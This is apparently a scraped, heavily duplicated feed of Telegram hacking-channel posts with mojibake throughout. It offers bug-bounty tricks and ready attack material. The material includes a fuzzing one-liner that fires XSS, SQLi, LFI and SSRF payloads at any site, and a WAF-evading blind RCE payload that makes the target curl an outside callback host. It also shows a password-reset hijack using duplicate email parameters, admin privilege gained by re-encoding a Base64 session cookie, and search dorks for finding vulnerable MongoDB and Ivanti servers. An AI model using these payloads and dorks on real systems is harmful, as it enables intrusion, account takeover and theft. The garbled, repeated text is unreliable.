π₯ Discover Web Vulns Like a Pro! π₯
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Hereβs a killer one-liner Iβve been using:
Whatβs it do?
1οΈβ£ Grabs URLs: gau digs up every URL for target.com from the webβs archives.
2οΈβ£ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3οΈβ£ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4οΈβ£ Fuzzes Hard: ffuf blasts payloads from my custom listsβXSS popups, file leaks, you name it!
5οΈβ£ Saves the Loot: Results land in param_vulns.txt for you to exploit.
π‘ Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Hereβs a killer one-liner Iβve been using:
gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt
Whatβs it do?
1οΈβ£ Grabs URLs: gau digs up every URL for target.com from the webβs archives.
2οΈβ£ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3οΈβ£ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4οΈβ£ Fuzzes Hard: ffuf blasts payloads from my custom listsβXSS popups, file leaks, you name it!
5οΈβ£ Saves the Loot: Results land in param_vulns.txt for you to exploit.
π‘ Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
π19β€8πΏ8
CVE-2025-3083, -3084, -3085: Vulnerabilities in MongoDB, 6.5 - 8.1 ratingβοΈ
Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.
Search at Netlas.io:
π Link: https://nt.ls/aqCrV
π Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]
Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.
Search at Netlas.io:
π Link: https://nt.ls/aqCrV
π Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]
Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
π3
Freelance Security Analyst for CTF Challenge
Job Type: Freelance | Remote | Short-term
We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
β Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
β CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
β Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
β Ethical hacking & exploit development (OSCP, CEH preferred)
π© Send your resume to [email protected] or WhatsApp +91-8016167754.
Letβs solve this challenge together!
Job Type: Freelance | Remote | Short-term
We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
β Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
β CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
β Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
β Ethical hacking & exploit development (OSCP, CEH preferred)
π© Send your resume to [email protected] or WhatsApp +91-8016167754.
Letβs solve this challenge together!
π15β€6
Brut Security pinned Β«Freelance Security Analyst for CTF Challenge Job Type: Freelance | Remote | Short-term We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in: β Web Exploitation, Reverse Engineering, Cryptography, Forensicsβ¦Β»
Use TLSx to detect certificate misconfigurations π
Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificatesπ
Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificates
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯46π2
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
π28π₯7β€3π€2
CVE-2025-22457: RCE in Ivanti Connect Secure, 9.0 rating π₯
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
π Link: https://nt.ls/zsWig
π Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
π Link: https://nt.ls/zsWig
π Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
β€5π3
π₯ Web Pentesting & Bug Bounty Batch β Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
β Weekday & Weekend Batches β Evening Slots (IST)
β Hands-on Labs & Live Automations
β Bug Bounty Methodologies & Practical Hunting
β Community Support & Private POC Access
π© Limited slots! Enroll now and take your hacking skills to the next level.
π± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
π5β€1
https://github.com/musana/CF-Hero
Please open Telegram to view this post
VIEW IN TELEGRAM
β€11π₯8πΏ4
domains.txt
836.9 KB
πDownload all bug bounty programs domains in scope items π―
πGet a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more β all in one place!π₯
ππΌStep 1: Download the domains.txt file
πstep 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
πStep 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactionsβ€οΈ
πGet a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more β all in one place!π₯
ππΌStep 1: Download the domains.txt file
πstep 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
πStep 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactionsβ€οΈ
π₯27π12β€11
π₯Top 25 Bug Bounty Platform π°
01. Bugcrowd
02. HackerOne
03. Intigriti
04. YesWeHack
05. Synack, Inc.
06. HackenProof | Web3 bug bounty platform
07. Open Bug Bounty
08. Immunefi
09. Cobalt
10. Zerocopter
11. Yogosha
12. SafeHats
13. Vulnerability Research Labs, LLC
14. AntiHACKme Pte Ltd
15. RedStorm Information Security
16. Cyber Army Indonesia
17. Hacktrophy
18. Nordic Defender
19. Capture The Bug
20. Bugbounter
21. Detectify
22. BugBase
23. huntr
24. Pentabug
25. SecureBug
Happy Hunt β€οΈ
01. Bugcrowd
02. HackerOne
03. Intigriti
04. YesWeHack
05. Synack, Inc.
06. HackenProof | Web3 bug bounty platform
07. Open Bug Bounty
08. Immunefi
09. Cobalt
10. Zerocopter
11. Yogosha
12. SafeHats
13. Vulnerability Research Labs, LLC
14. AntiHACKme Pte Ltd
15. RedStorm Information Security
16. Cyber Army Indonesia
17. Hacktrophy
18. Nordic Defender
19. Capture The Bug
20. Bugbounter
21. Detectify
22. BugBase
23. huntr
24. Pentabug
25. SecureBug
Happy Hunt β€οΈ
π₯23π7β€1
π₯Never forget to check for blind RCE!π₯
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline β URL encoded)
And boom β Blind RCE triggered! My server got the hit instantly.
Cybersecurity isnβt about effort β itβs about mindset. Deep thinking always wins over brute force.β€οΈ
DarkShadow
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline β URL encoded)
And boom β Blind RCE triggered! My server got the hit instantly.
Cybersecurity isnβt about effort β itβs about mindset. Deep thinking always wins over brute force.β€οΈ
DarkShadow
β€34π9π₯7π³3
π₯You can findπ₯
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)π§π
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass β
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)π§π
target.com/hidden this page required authentication or redirect to /login page.
Try: target.com/login/hidden
OMG! Auth bypass β
π19π€12β€7π₯3
Password Reset Bypass Trick π
Some poorly secured endpoints accept multiple email parameters.π³
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emailsβ¦ youβre in.β‘
Now imagine if the victim is an admin β hello dashboard, hello bounty!π°
#bugbountytips
Some poorly secured endpoints accept multiple email parameters.π³
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emailsβ¦ youβre in.β‘
Now imagine if the victim is an admin β hello dashboard, hello bounty!π°
#bugbountytips
π28β€9π¨βπ»6π₯1π€1π1π³1
Recently disclosed hackerone critical bug, which can exploitable under few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
β€77π16πΏ11π₯5π2
A simple hunt can flip the whole game!π
While testing a web app, I noticed this suspicious-looking session cookie:
I quickly ran it through Base64 decoding:
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
Then replaced the cookie:
BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π13π₯10π3